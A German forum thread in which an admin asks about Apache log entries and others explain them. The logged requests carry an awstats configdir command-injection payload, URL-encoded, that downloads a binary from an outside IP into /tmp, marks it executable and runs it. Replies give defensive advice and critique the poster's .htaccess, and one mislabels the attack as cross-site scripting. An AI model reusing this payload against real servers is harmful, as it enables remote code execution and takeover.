Hacker in Apache log Datei ?

F

flautecam

Registered User
Moin Moin
In meiner Logdatei des Apache finde ich immer wieder diese Zeilen:
Code: 
218.18.3.21 - - [20/Dec/2005:18:53:20 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 364
218.18.3.21 - - [20/Dec/2005:18:53:20 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.18.3.21 - - [20/Dec/2005:18:53:24 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 1038
218.18.3.21 - - [20/Dec/2005:18:53:24 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 1038 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.18.3.21 - - [20/Dec/2005:18:53:24 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 372
218.18.3.21 - - [20/Dec/2005:18:53:24 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 372 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Ich habe keine Ahnung von dem was der User bei mir will und frage deshalb mal bei Euch nach.
 
Last edited by a moderator:
Der will nur dein bestes (eigentlich Geld, aber in diesem Fall) deinen Server. Und bei dem Versuch diesen zu kompromitieren entstehen in der Log diese Einträge.
Und Nein du kannst nichts dagegen machen, dass er es versucht, außer "/etc/init.d/apache2 stop" eingeben.

Evtl. solltest du deine Scripte mal überprüfen.
 
Last edited by a moderator:
Hallo!
Ein versuch von Cross Site Scripting. Achte darauf, dass du beispielsweise deine Apache und PHP Versionen aktuell hälst.
In deinem konrekten Fall wird versucht, eine Lücke in awstats auszunutzen. Solltest du diese Software einsetzten, überprüfe ob sie aktuell ist. In der Vergangenheit gabt es massive Sicherheitslücken.

mfG
Thorsten
 
Last edited by a moderator:
Moin Moin
Zunächst einmal vielen Dank für die schnellen Antworten.
awstats benutze ich nicht und mein PHP sowie der Apache sind auf dem neuesten Stand.
Das Verzeichnis cgi-bin ist mit .htaccess geschützt.
Nun habe ich versucht mich ein wenig schlauer zu machen und habe auf Grund des folgenden Eintrags in mein Logfile auch das ausführen eines POST Befehls unterbunden.
199.217.208.166 - - [21/Dec/2005:18:39:13 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1038
Meine .htaccess sieht so aus:

<Files .htaccess>
order allow,deny
allow from all
deny from all
</Files>
<LIMIT POST>
order allow, deny
allow from all
deny from .flautecam.de
</LIMIT>

Ich hoffe ich habe das so richtig gemacht.
Moin Moin Peter
 
Hallo!
Bei der Option ORDER macht ein
Code: 
allow from all
deny from all
keinen wirklichen Sinn. Und auch die LIMIT Option gehört doch eigentlich anders herum, oder?

mfG
Thorsten
 
flautecam said:
199.217.208.166 - - [21/Dec/2005:18:39:13 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1038
Click to expand...
Warum die Mühe? Hier steht doch bereits 404. Da brauchst Du doch nicht weiter zu werkeln.

deny from .flautecam.de
Click to expand...
Damit zwingst Du Apache bei jedem Request einen ReverseLookup zu machen. Das geht auf die Performance und verzögert jede Auslieferung.

huschi.
 
You must log in or register to reply here.
Back
Top